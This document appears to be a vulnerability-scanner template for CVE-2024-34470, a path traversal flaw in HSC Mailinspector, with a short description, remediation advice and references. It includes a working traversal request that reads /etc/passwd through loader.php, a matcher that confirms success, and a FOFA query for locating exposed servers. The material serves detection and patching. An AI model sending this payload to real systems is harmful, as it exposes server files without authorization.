An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
PoC代码[已公开]
id: CVE-2024-34470
info:
name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
author: topscoder
severity: high
description: |
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
impact: |
Unauthenticated attackers can exploit path traversal to read arbitrary files from the server.
remediation: |
Update HSC Mailinspector to a version later than 5.2.18 that patches the path traversal vulnerability.
reference:
- https://github.com/osvaldotenorio/CVE-2024-34470
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-34470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.92993
epss-percentile: 0.99769
metadata:
verified: true
max-request: 2
fofa-query: "mailinspector/public"
tags: cve,cve2024,lfi,mailinspector,hsc,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/mailinspector/login.php"
host-redirects: true
matchers:
- type: word
part: body
words:
- "Licensed to HSC TREINAMENTO"
- method: GET
path:
- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502202c405de1488271cf7fa1d09ed158a8e767972a1b80c54f2c1c72249528eb67fe022100c5f775afc2688e749f56dcca37f4a29ef25758bc2bde20f8795a8c5d2a26a137:922c64590222798bb761d5b6d8e72950